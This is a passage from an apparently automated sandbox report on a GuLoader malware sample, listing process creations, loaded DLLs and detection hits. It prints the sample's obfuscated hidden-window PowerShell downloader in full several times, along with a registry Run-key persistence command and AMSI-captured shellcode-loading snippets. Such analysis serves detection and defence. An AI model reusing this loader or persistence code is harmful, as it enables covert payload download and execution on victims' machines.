gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: stem.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1971988827.0000000007314000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 0000000A.00000002.1971988827.000000000737C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbW source: powershell.exe, 0000000A.00000002.1938539115.0000000000B93000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000E.00000002.2499274880.00000000054F3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1988703799.000000000A323000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Efterbrndingen)$GlObAl:reKuRSERNes = [sYSTem.TExT.eNcOdiNG]::asCii.GetSTrinG($FinheDERNE)$glObAL:TOTeMisTs=$ReKURsErneS.SUbstRiNg($hEdVinenE143,$MouLdINGS)<#Udskammende Udstdelsers P
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Upstares33 $Systemudviklingsarbejde $Varsomt), (Keratoscopy @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Anretterborde = [AppDomain]::CurrentDomain.GetA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Konflikttilstanden59)), $Rockerproblemet).DefineDynamicModule($Bilirubinuria, $false).DefineType($Foujdary, $Skruninger, [System.Multi
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Efterbrndingen)$GlObAl:reKuRSERNes = [sYSTem.TExT.eNcOdiNG]::asCii.GetSTrinG($FinheDERNE)$glObAL:TOTeMisTs=$ReKURsErneS.SUbstRiNg($hEdVinenE143,$MouLdINGS)<#Udskammende Udstdelsers P
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePa
